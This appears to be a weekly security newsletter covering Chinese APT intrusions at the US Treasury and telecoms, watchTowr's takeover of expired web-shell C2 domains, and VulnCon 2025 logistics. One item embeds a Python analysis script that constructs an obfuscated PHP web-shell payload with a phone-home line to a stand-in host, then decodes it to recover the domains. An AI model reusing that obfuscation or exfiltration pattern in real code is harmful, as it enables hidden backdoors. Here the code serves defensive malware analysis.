A Very Chinese New Year
Happy New Year everyone! It's a new year, with new news, and the same old(er) MegaZone. This time we're looking at news that I found worthy from the week of January 5–11, 2025. (Have you gotten used to typing 2025 yet?) I found it to be a fairly slow news week, and not much really grabbed my attention enough that I felt it was worth commenting on. That's not too unusual for the start of a new year, as there is often a bit of a post-holiday lull. Not that there was no news at all. It is never truly quiet in cybersecurity, just that most of it was run-of-the-mill stuff, IMHO.
Before I dive into this week's news, I'm going to abuse my editorial power to plug a couple of things. F5 Labs published their 2025 Cybersecurity Predictions, which is also a look back at the 2024 predictions, and how they panned out. Let's see how the new predictions play out this year.
Speaking of the 2025 Cybersecurity Predictions, that was one of the two subjects we covered in the December episode of AppSec Monthly. The other topic was a look back at a subject from my last issue of TWIS, the Hack The Box study on the mental health of security professionals. It's a subject I care about quite a bit, and something I've seen many of my peers struggle with, and have struggled with myself. We work in an intense, stressful field, and there is a general attitude of 'toughing it out', which just defers the impacts.
This was my third episode of AppSec Monthly, starting in October. I am the new 'permanent' F5 SIRT host, so you should see me each month. Hopefully I'll get better at it with practice, and you can follow along with the playlist, as well as checking out past episodes. I have some big shoes to fill with Aaron's departure; hopefully I can uphold the high standard he set. AppSec Monthly is also available as a podcast on Spotify, iTunes, and probably other platforms I'm forgetting about.
Oh, and as for the title of this 'issue', I know the Lunar New Year (aka Chinese New Year) isn't until January 29, but I couldn't pass up the play on words given the topic below. And with that, let's dive in.
Year of the Snake
Last week Chris wrote about a Chinese APT targeting the US Treasury, and my main topic this week is a continuation and expansion of that. Cybersecurity news in recent weeks has been full of stories relating to Chinese threat actors. That's a major, evolving story, which reaches beyond cybersecurity into global geopolitics. Without getting too deep into US politics, given the new presidential administration's prior attitudes toward and comments on China, I expect these events to have some significance.
I'm going to rewind a bit to the previous week, which still saw stories about Chinese APT Salt Typhoon compromising multiple US telco providers, giving them the ability to geolocate millions of devices and record communications. The actual extent of the intrusion is reportedly much more limited, with actions targeted at specific, high-value individuals, but the access was there. At the same time there was also coverage of the US Treasury Department being compromised via a vulnerability in BeyondTrust's remote support software. Within days this coverage was updated to highlight that the Office of Foreign Assets Control (OFAC), the Treasury office that administers economic and trade sanctions, was specifically targeted.
As we entered this week, it was reported that OFAC was sanctioning Beijing-based Integrity Technology Group, Inc., a cybersecurity company that has been linked to the state-sponsored APT Flax Typhoon (not to be confused with Salt Typhoon). Flax Typhoon was involved in malicious actions against US critical infrastructure providers in 2022 and 2023, using Integrity's infrastructure to conduct its operations. The US State Department says Flax Typhoon has targeted governmental organizations, telecommunications providers, media companies, and others, both within the US and in a number of other countries, most prominently Taiwan. You can see why OFAC would be of particular interest to a state-sponsored Chinese APT: it offers insight into potential upcoming sanctions.
Coverage of these issues continued throughout the week. CISA stated that the BeyondTrust Treasury Department hack did not affect other federal agencies, which was a bit of good news. The primary BeyondTrust vulnerability was a critical command injection, assigned CVE-2024-12356, and it was added to CISA's Known Exploited Vulnerabilities (KEV) catalog on December 19. There was also a medium-severity vulnerability involved, CVE-2024-12686; this second vulnerability was itself only added to the KEV on January 13. Another piece of good news came when both AT&T and Verizon, two of the nine telecom providers compromised by Salt Typhoon, reported that they'd purged the intrusion from their networks. Both carriers say they've notified all individuals who were targeted by Salt Typhoon, so if you haven't heard otherwise I guess you can assume you're safe.
Early in the week, speaking at a Foundation for Defense of Democracies event, National Cyber Director Harry Coker Jr. called for the US to do more to deter China as a cybersecurity threat. Exactly what needs to be done to deter China seems to be less clear. What's been done so far appears to be completely ineffective, so more of the same doesn't seem like it would cut it. Then late in the week, it was reported that the Treasury breach also targeted the Committee on Foreign Investment in the US (CFIUS). This interagency committee, chaired by the Treasury, oversees foreign investment in the US, such as from China, as the name implies. One of its recent actions had been to step up review of real estate sales near US military bases, in particular sales to Chinese entities.
China has, of course, largely denied their involvement in any or all of this.
Of course, mixed into all of this is the looming, absolutely idiotic, TikTok ban on January 19. The ban is nothing but ineffective political posturing, IMHO, if my opinion wasn't clear. It's disrupting the lives, and livelihoods, of millions of users and creators because politicians got their knickers in a twist over a popular social media platform, gasp, not being US-owned! Of course, the same people flip out when other nations take a similar view toward US-owned platforms operating in their countries.
The irony is that the ban - due to TikTok being owned by China's ByteDance, and pearl-clutching and hand-wringing over China being able to influence content (as if foreign entities don't rabidly influence content on X, Facebook, Instagram, or any non-Chinese owned social media platform) - seems to be driving many people to move to a similar app, RedNote, aka Xiaohongshu. RedNote is also Chinese-owned, and even more closely aligned with China, as its primary user base is Chinese, unlike TikTok's. That's just a beautiful example of the law of unintended consequences. If the US government wanted an efficient way to make a generation resent them, they seem to have found it.
The ban is just another factor in the tense geopolitical situation. I'm sure we're far from seeing the end of these issues, and I'm just as sure there will be more to come. What I'm not at all sure about is how this will all play out.
- https://www.theregister.com/2024/12/30/att_verizon_confirm_salt_typhoon_breach/
- https://www.theregister.com/2024/12/31/us_treasury_department_hacked/
- https://www.theregister.com/2025/01/02/chinese_spies_targeted_sanctions_intel/
- https://www.cybersecuritydive.com/news/treasury-sanctions-flax-typhoon/736538/
- https://www.scworld.com/news/us-sanctions-chinese-service-provider-for-supporting-threat-group
- https://www.cybersecuritydive.com/news/cisa-hack-treasury-federal-agencies/736654/
- https://www.cybersecuritydive.com/news/att-verizon-salt-typhoon/736680/
- https://www.cybersecuritydive.com/news/national-cyber-director-coker-china-deterrence/736920/
- https://www.scworld.com/news/chinese-hackers-breach-office-that-reviews-foreign-investments-in-us
- https://www.theregister.com/2025/01/10/china_treasury_foreign_investment/
- https://www.cybersecuritydive.com/news/cisa-second-beyondtrust-cve-exploited/737288/
- https://www.cisa.gov/news-events/alerts/2024/12/19/cisa-adds-one-known-exploited-vulnerability-catalog
- https://www.cisa.gov/news-events/alerts/2025/01/13/cisa-adds-two-known-exploited-vulnerabilities-catalog
Digital Urbex
The exploration of abandoned infrastructure in the physical world, often called Urban Exploration, or Urbex, can be fun and interesting. Also perhaps marginally legal. And dangerous. But fun. I'll just say Union Station in Worcester, MA had a very interesting interior, very Planet of the Apes, before it was restored and reopened. Anyway, it looks like a bit of digital urbex can be similarly fun and interesting, and entails less physical danger. Though still perhaps marginally legal.
It turns out that if you're of a criminal bent and decide to save some labor by purchasing existing web shell backdoors on your target's devices from like-minded individuals, those web shells may contain backdoors of their own, giving their creators access to all of your work. (Insert 'Inception' joke here.) These backdoors-within-backdoors call out to hard-coded domain names for command and control.
Sometimes their creators let those domain names lapse, as covered by watchTowr Labs in their new report. You may recall watchTowr from last September, when they registered the expired domain of the legacy .mobi WHOIS server and found that many clients were still querying it. That one is also a very interesting read, and if I'd been on TWIS duty that week I'm sure I would've included it, as it's a good tale. The two stories share a theme: exploiting abandoned or expired infrastructure to gain access to systems. Do check that one out too, but now back to the current news.
By picking apart web shell samples to uncover the encoded domain names, they were able to register the unclaimed domains and start monitoring incoming requests. And boy did they get some requests. They've uncovered more than 4,000 unique, live backdoors, and counting, all from commandeering the C&C domains of the backdoors' backdoors. The compromised systems include governmental systems in Bangladesh, China, and Nigeria, universities or higher education systems in Thailand, China, and South Korea, and much more.
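A concrete illustration of the 'find the hard-coded C&C domain' step, as an added example that is not part of watchTowr's report or tooling: the Python below peels the string-obfuscation layers commonly used in PHP web shells (eval(gzinflate(base64_decode(...))), str_rot13() literals, and "\x.." hex escapes) and lists the domains hidden in them. The web shell it analyses is constructed in the script itself, with reserved example.* names standing in for a real operator's infrastructure, and it is only ever decoded as text, never executed.

```python
"""Peel the string-obfuscation layers found in PHP web shells and list the
hard-coded domains an embedded 'backdoor in the backdoor' would call home to.

Added, illustrative example; not watchTowr's code. The sample web shell is
constructed below and is only decoded as text, never executed."""
import base64
import codecs
import re
import zlib

# Constructed, hypothetical phone-home targets (reserved example.* names).
INNER_PHONE_HOME = ("@file_get_contents('http://sync.example.net/ping.php?h='"
                    ".$_SERVER['HTTP_HOST'].'&p='.__FILE__);")
INNER_ROT13_DOMAIN = "stats.example.org"
INNER_HEX_URL = "https://cdn-update.example.com/"


def build_sample_shell() -> str:
    """Assemble a PHP fragment using three idioms seen in real shells:
    eval(gzinflate(base64_decode('...'))), str_rot13('...') and hex escapes."""
    co = zlib.compressobj(wbits=-15)  # raw DEFLATE, as PHP's gzdeflate() emits
    deflated = co.compress(INNER_PHONE_HOME.encode()) + co.flush()
    b64 = base64.b64encode(deflated).decode()
    rot = codecs.encode(INNER_ROT13_DOMAIN, "rot13")  # 'fgngf.rknzcyr.bet'
    hexed = "".join("\\x%02x" % b for b in INNER_HEX_URL.encode())
    return (
        "<?php\n// harmless-looking plugin loader\n"
        f"@eval(gzinflate(base64_decode('{b64}')));\n"
        f"$c = str_rot13('{rot}');\n"
        f'$u = "{hexed}";\n'
    )


B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
HEX_RE = re.compile(r"(?:\\x[0-9a-fA-F]{2}){4,}")
ROT13_RE = re.compile(r"str_rot13\(\s*['\"]([^'\"]+)['\"]\s*\)")
DOMAIN_RE = re.compile(
    r"\b(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,}\b", re.I)
# Things that look like domains in source code but are really file names.
NOT_DOMAINS = {"php", "js", "html", "htm", "txt", "asp", "aspx", "jsp", "inc", "log"}


def _as_text(data: bytes):
    """Return data as str if it is printable text, otherwise None."""
    if not data:
        return None
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None


def _inflate(raw: bytes) -> bytes:
    """Raw-DEFLATE decompress, the counterpart of PHP's gzinflate()."""
    try:
        return zlib.decompress(raw, -15)
    except zlib.error:
        return b""


def _decode_once(text: str) -> list:
    """Decode every obfuscated span in text by one level; return new layers."""
    layers = []
    for m in B64_RE.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError
            continue
        for candidate in (raw, _inflate(raw)):
            decoded = _as_text(candidate)
            if decoded:
                layers.append(decoded)
    for m in HEX_RE.finditer(text):
        decoded = _as_text(bytes.fromhex(m.group(0).replace("\\x", "")))
        if decoded:
            layers.append(decoded)
    for m in ROT13_RE.finditer(text):
        layers.append(codecs.encode(m.group(1), "rot13"))
    return layers


def peel_layers(source: str, max_layers: int = 32) -> list:
    """Breadth-first, bounded walk over every text layer reachable from source."""
    layers, queue, seen = [], [source], set()
    while queue and len(layers) < max_layers:
        text = queue.pop(0)
        if text in seen:
            continue
        seen.add(text)
        layers.append(text)
        queue.extend(_decode_once(text))
    return layers


def _mask_obfuscated(text: str) -> str:
    """Blank still-encoded spans so their ciphertext is not read as a domain."""
    for rx in (B64_RE, HEX_RE):
        text = rx.sub(" ", text)
    return ROT13_RE.sub(" ", text)


def extract_c2_domains(source: str) -> list:
    """Domains found in the shell source and in every decoded layer beneath it."""
    found = set()
    for layer in peel_layers(source):
        for m in DOMAIN_RE.finditer(_mask_obfuscated(layer)):
            name = m.group(0).lower()
            if name.rsplit(".", 1)[-1] not in NOT_DOMAINS:
                found.add(name)
    return sorted(found)


if __name__ == "__main__":
    for domain in extract_c2_domains(build_sample_shell()):
        print(domain)
```

Run it and the three example.* names come out, while the rot13 ciphertext fgngf.rknzcyr.bet does not, because still-encoded spans are masked before the domain regex runs. On a real sample the follow-up is a WHOIS or RDAP lookup on each recovered name to see which ones have expired and can simply be registered, which is the step watchTowr took.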
Of course, this left watchTowr responsible for this backdoor infrastructure. If they allowed the domains to lapse once again, someone with ill intent would be able to pick them up. But that won't happen, as The Shadowserver Foundation has taken ownership of the domains and will sinkhole them to prevent their use.
I wonder if watchTowr will be exploring any more abandoned digital infrastructure. I hope they do, the results have been interesting.
- https://www.theregister.com/2025/01/08/backdoored_backdoors/
- https://cyberscoop.com/malicious-hackers-have-their-own-shadow-it-problem/
- https://labs.watchtowr.com/more-governments-backdoors-in-your-backdoors/
VulnCon 2025 Approaches
The 2025 Vulnerability Management Ecosystem Collaboration, Ideation, and Action Conference, aka VulnCon 2025 (let's all agree to never use that full name, OK?), is returning to Raleigh, NC, Monday, April 7th through Thursday, April 10th. We'll be back at the North Carolina State University McKimmon Center, the same location as last year. This year it is four days, up from three, and we have more space in the facility, which all translates to more content. I'm saying 'we' because I am, again, one of the organizers, as a co-chair of the CVE.org Vulnerability Conference and Events Working Group (VCEWG). VulnCon is co-hosted by FIRST and the CVE Program.
Last year we sold out the in-person admission and this year, even with the additional capacity, we expect to do so again. So, if you are thinking of attending in person, don't wait too long to register. Standard registration is US $300.00 through March 9th, and late registration is US $375.00 after March 9th - until sold out. Registration includes 'coffee breaks' and buffet lunches, and an on-site Welcome Reception on Monday, April 7.
VulnCon is a hybrid event, and all panels will be streamed. Virtual admission is only US $100.00. Virtual is better than nothing, but if you can be there in person I encourage it; the Hallway Con is strong. There's also a ticketed Offsite Social on Tuesday, April 8 19:00-21:00 in downtown Raleigh—tickets are $30.
The CFP is still open (see the next item below), so the 2025 program has yet to be finalized, but you can get an idea of what to expect from last year's program.
VulnCon 2025 CFP Extended
The VulnCon Call For Papers deadline was Wednesday, January 15 - the day I'm wrapping up this edition of TWIS. But on the 14th, having heard from a few procrastinators, we extended the deadline to a hard stop of Friday, January 31, 2025. We will not be extending it again as we need time for the review committee to finalize selections, while leaving enough time for those selected to prepare their materials.
If you've been procrastinating and thought you missed the deadline, or if this is the first you're hearing of this and you have something you'd like to present, you have a couple of weeks to get those proposals in. Don't wait until the 31st. If you'd like an idea of the type of content VulnCon is looking for, check out last year's program.
Pro Tip on VulnCon Hotels
As mentioned above, VulnCon is in Raleigh, NC April 7–10. The Dreamville (Music) Festival is in Raleigh, NC April 5-6 - the weekend just before VulnCon. This has caused a bit of a squeeze on hotel rooms that weekend. Some hotels are booked for the weekend, and most of them appear to have increased their room rates for those nights due to the increased demand. Unsurprisingly, the lower-priced hotels have the least availability, and if you try to book a room for the week, with a weekend arrival, you may only find more expensive options. Of course, you could always attend the festival and then come to VulnCon and twofer your trip.
Availability increases, and room rates decrease, beginning Monday. One option would be to arrive Monday morning and avoid the higher weekend rates entirely. Another option is to book whatever is available for the weekend and then make a separate reservation starting on Monday at a more affordable hotel, to reduce your overall travel spend. I need to be there before Monday, so that's what I'm doing—and it saved around $800 for the week.
In either case, you will be able to check bags at the McKimmon Center for the day. So you could come straight there Monday, or check out of your first hotel and bring your bag(s) for the day, and then check in to your hotel for the rest of the week that evening. There is a list of suggested hotels on the VulnCon site. Most of them are in and around downtown, but the TownePlace Suites and Holiday Inn Express & Suites are perhaps the closest to the facility, on the other side of campus from downtown, and a very short ride—literally at the end of the road the McKimmon Center is on. They're both fairly new, built in 2020 I believe, and are decent. I stayed at TownePlace last year and had a great experience, so I will be doing so again.
Maybe this will save you a little frustration, and a few bucks.
That Was the Week That Was
Thank you for your time and attention this week. I hope you found something of value in my ramblings.
As always, if this is your first TWIS, you can always read past editions. I also encourage you to check out all of the content from the F5 SIRT.